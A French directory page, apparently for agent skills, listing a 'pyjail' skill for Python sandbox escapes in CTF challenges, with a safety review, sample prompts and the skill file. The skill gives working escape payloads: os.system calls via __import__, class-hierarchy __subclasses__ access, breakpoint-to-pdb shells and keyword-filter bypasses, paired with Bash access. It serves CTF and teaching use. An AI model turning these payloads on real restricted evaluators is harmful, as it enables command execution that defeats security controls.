Évasion de prison Python

VérifiéPrudence

Échapper aux restrictions de la sandbox Python. Utile pour les environnements restreints d'évaluation/exécution, les défis de prison Python.

Spar Skills Guide Bot
SecuriteAvancé
1030/07/2026
Claude CodeCursorWindsurfCopilotCodex
#python-sandbox-escape#jail-escape#ctf#bypass-techniques

Recommandé pour

Notre avis

Fournit des techniques pour échapper aux environnements Python restreints (jails) en contournant les filtres et en exécutant des commandes.

Points forts

  • Couvre plusieurs techniques d'évasion (builtins, hiérarchie de classes, breakpoint)
  • Inclut une référence rapide et des méthodes de débogage
  • Adapté aux défis CTF et aux environnements sécurisés

Limites

  • Suppose une connaissance de base de Python
  • Peut ne pas fonctionner contre toutes les implémentations de sandbox (par exemple, builtins complètement bloqués)
  • Certaines techniques peuvent être corrigées dans les versions récentes de Python
Quand l'utiliser

Lorsque vous rencontrez un sandbox Python ou un jail qui restreint l'exécution de code et que vous devez exfiltrer des données ou exécuter des commandes système.

Quand l'éviter

Dans des environnements de production ou des systèmes dont vous n'êtes pas propriétaire, et lorsque d'autres méthodes de contournement plus simples sont disponibles.

Analyse de sécurité

Prudence
Score qualité85/100

The skill is a collection of Python jail escape payloads and techniques. While intended for educational or CTF use, it inherently enables circumventing security restrictions in Python environments. When combined with the allowed Bash tool, an agent could execute arbitrary system commands, posing a moderate risk if not properly sandboxed.

Points d'attention
  • Teaches Python sandbox escape techniques that enable arbitrary command execution via system calls.
  • Allows use of Bash tool, which could be leveraged to run destructive commands if combined with an escaped shell.
  • Provides methods to bypass keyword filters and restricted builtins, potentially leading to unauthorized access.

Exemples

Basic builtins escape
I need to escape a Python eval sandbox that blocks 'import' and 'os'. How can I execute 'cat flag.txt' using string concatenation or character codes?
Class hierarchy escape
In a Python jail with no builtins available, find a way to access the os module using the class hierarchy of tuples or strings to execute 'ls -la'.
Breakpoint escape
I'm in a Python 3.7+ jail that allows breakpoint(). Show me how to drop into pdb and run shell commands to read a file.

name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob

Python Jail Escape Skill

Quick Workflow

Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag

Quick Reference - Common Escapes

# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")

# Using breakpoint (Python 3.7+)
breakpoint()  # Drops into pdb, then !cat flag.txt

# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')

# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')

Reference Files

| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |

Quick Debugging

# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
    if 'wrap' in str(c): print(i, c)

# Check available builtins
dir(__builtins__)
Skills similaires